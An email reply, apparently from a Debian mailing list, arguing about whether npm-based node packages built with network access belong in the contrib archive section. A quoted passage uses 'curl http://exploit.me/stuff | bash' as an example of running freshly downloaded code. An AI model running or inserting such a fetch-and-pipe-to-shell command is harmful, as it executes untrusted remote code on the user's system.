On ചൊവ്വ 03 ഒക്ടോബര് 2017 11:04 വൈകു, Gunnar Wolf wrote: > I *do* take note, however, of: > > Examples of packages which would be included in contrib are: > > • free packages which require contrib, non-free packages or packages > which are not in our archive at all for compilation or execution, > and > • wrapper packages or other sorts of free accessories for > non-free programs. > > The first point would seem to cover your use case. However, it's not > necessarily covering (...) compilation or execution via code just > downloaded. It does not cover the equivalent of > "curl http://exploit.me/stuff | bash" Lets take the two issues separately. 1. Whether they are suitable for contrib 2. Whether network can be used during build. > I would strongly prefer to ship pre-built binaries as part of your > environment in debian/. > > I guess the ftp-masters approved the packages you mention as they > *looked* sane, but not because of a deeper inspection of how they were > built. I see² you have 17 packages in contrib, out of which 14 are > node-*. Do they all use npm? Would you appreciate if I took a look at > them and filed bugs accordingly to ask for ftp-masters' opinion? Like I noted in my previous mail, I already agreed to upload pre-built binaries and my contention is only on point 1. You may ask ftp-masters on suitability of them being in contrib even with pre-built binaries. I have also explained in my previous mails that these are always built on a maintainer's machine as buildds already prohibit network access during build. So we are only talking about a change in perception.
Description: OpenPGP digital signature